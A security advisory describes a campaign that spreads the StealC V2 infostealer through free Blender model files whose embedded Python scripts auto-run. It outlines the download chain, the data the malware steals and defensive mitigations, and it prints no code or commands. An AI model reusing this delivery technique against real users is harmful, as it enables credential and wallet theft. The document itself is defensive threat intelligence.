Researchers have identified a malicious campaign distributing the StealC V2 infostealer through free Blender 3D model files containing embedded Python scripts. Blender, a widely used open-source 3D graphics and animation suite, supports Python scripting to automate tasks and extend functionality. Attackers exploit this feature by uploading .blend files with malicious scripts to popular 3D model marketplaces such as CGTrader. When users download and open these files with Blender’s Auto Run Python Scripts feature enabled, the embedded script executes automatically without user interaction. The script connects to a remote server hosted on Cloudflare Workers, downloads a malware loader, and executes a PowerShell script that fetches additional payloads. The final payload, StealC V2, is an infostealer capable of extracting data from over 23 browsers, more than 100 browser extensions, 15 cryptocurrency wallet applications, and communication tools including Telegram, Discord, and ProtonVPN. It also bypasses User Account Control (UAC) to escalate privileges. This attack vector leverages legitimate software features rather than exploiting software vulnerabilities, making it difficult to detect and prevent without proper configuration and awareness. The campaign underscores the risks posed by unvetted third-party content and the lack of security oversight in departments using specialized tools like Blender. The threat is particularly concerning for organizations relying on open-source software and external content marketplaces, as it can lead to significant data breaches and espionage.

For European organizations, especially those in creative industries, media production, architecture, and visualization sectors that commonly use Blender, this threat poses a significant risk of data theft and operational compromise. The StealC infostealer’s ability to harvest credentials, browser data, crypto wallets, and communications can lead to intellectual property theft, financial fraud, and exposure of sensitive corporate information. The attack can also facilitate lateral movement within networks if attackers leverage stolen credentials. Since the infection vector is embedded in freely available 3D models, employees downloading unvetted content can inadvertently compromise corporate devices. This risk is exacerbated in organizations without strict software usage policies or security awareness training. The stealthy nature of the attack, leveraging legitimate automation features, complicates detection and response. Additionally, the use of cloud-based infrastructure for payload delivery can bypass traditional network defenses. Overall, the threat can result in confidentiality breaches, loss of trust, regulatory penalties under GDPR, and financial losses.

European organizations should immediately disable Blender’s Auto Run Python Scripts feature to prevent automatic execution of embedded scripts. Security teams must implement strict policies prohibiting the use of unapproved third-party tools and content, including 3D models from untrusted sources. Conduct thorough risk assessments before adopting new software or content platforms. Deploy endpoint detection and response (EDR) solutions capable of monitoring script execution and PowerShell activity to detect suspicious behaviors. Regularly train employees on the risks of downloading and opening files from external marketplaces, emphasizing the dangers of automation features. Enforce application whitelisting and restrict PowerShell execution policies to limit malware execution. Integrate sandboxing or file scanning solutions that can analyze 3D model files and embedded scripts before use. Maintain up-to-date threat intelligence feeds to monitor emerging campaigns targeting creative software. Finally, ensure multi-factor authentication and network segmentation to limit damage from credential theft.